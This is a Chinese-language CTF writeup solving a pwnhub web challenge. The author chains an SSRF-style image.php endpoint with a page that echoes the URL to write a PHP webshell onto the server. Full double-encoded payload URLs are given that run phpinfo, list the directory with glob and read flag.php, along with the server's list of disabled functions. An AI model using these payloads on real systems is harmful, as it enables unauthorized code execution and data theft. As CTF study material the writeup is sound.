pwnhub——胖哈勃外傳-第一集 writeup

前三次都忘了報名了,第四次那個csrf那個題當時已經想對了,也繞過了,但是最後迫於信安技術作業和ppt的壓力結果最後沒有做完,也是蠻遺憾的。

這次終於有機會在補seccon的空隙把這一期的題做了。不過這一期的題目相對來說要比前幾期簡單些。

首先看看網站。在首頁的源碼裏面有這樣一部分很奇怪


<script src="http://54.223.231.220/image.php?file=http://127.0.0.1:8888/test.png&path=logo.jpg"></script>

訪問下,說是logo.jpg更新成功。

試了幾下,發現以下幾點

  • 首先這個鏈接是訪問file指向的鏈接,並將返回的內容寫到path指向的文件

  • file指向的連接必須是127.0.0.1的,不太好繞過

  • path可以是.php後綴的文件,但是過濾的尖括號,沒有辦法二次訪問直接webshell。

綜上思路就是想辦法在本站下找一個地方可以寫webshell的,然後通過這個image.php直接寫webshell。

但是剛纔說了沒有辦法二次訪問image.php直接寫webshell。

所以還要另外找地方。

然後發現這個地方http://54.223.231.220/?date/2016-07/

這裏寫圖片描述

日期被直接打印出來了,那麼我們試試,果然這裏可以打印鏈接上的內容,所以構造poc如下:(注意要二次url編碼)


http://54.223.231.220/image.php?file=http%3A%2f%2f127.0.0.1%3A8888%2f%3Fdate%2f2016-07%253C%253Fphp%2520%2520phpinfo%2528%2529%253B%2520%253F%253E%2f&path=bendawang.php

訪問http://54.223.231.220/bendawang.php,截圖如下:

這裏寫圖片描述

成功了,那麼看看被禁用的函數:


pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,fopen,fread,fwrite,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen,assert

幾乎所有執行命令的函數都被禁用了。

那麼先用glob遍歷下目錄把


http://54.223.231.220/image.php?file=http%3A%2f%2f127.0.0.1%3A8888%2f%3Fdate%2f2016-07%253C%253Fphp%2520%2520foreach%2528glob%2528%2522.%252f%252a%2522%2529%2520as%2520%2524bdw%2529%257B%2520%2520echo%2520%2524bdw.%2522%253Cbr%253E%2522%253B%2520%257D%253F%253E%2f&path=bendawang.php

訪問截圖如下:

這裏寫圖片描述

發現一個flag.php,直接讀取內容看看,poc如下:


http://54.223.231.220/image.php?file=http%3A%2f%2f127.0.0.1%3A8888%2f%3Fdate%2f2016-07%253C%253Fphp%2520%2520echo%2520file_get_contents%2528%2527flag.php%2527%2529%253B%253F%253E%2f&path=bendawang.php

截圖如下,拿到flag

這裏寫圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章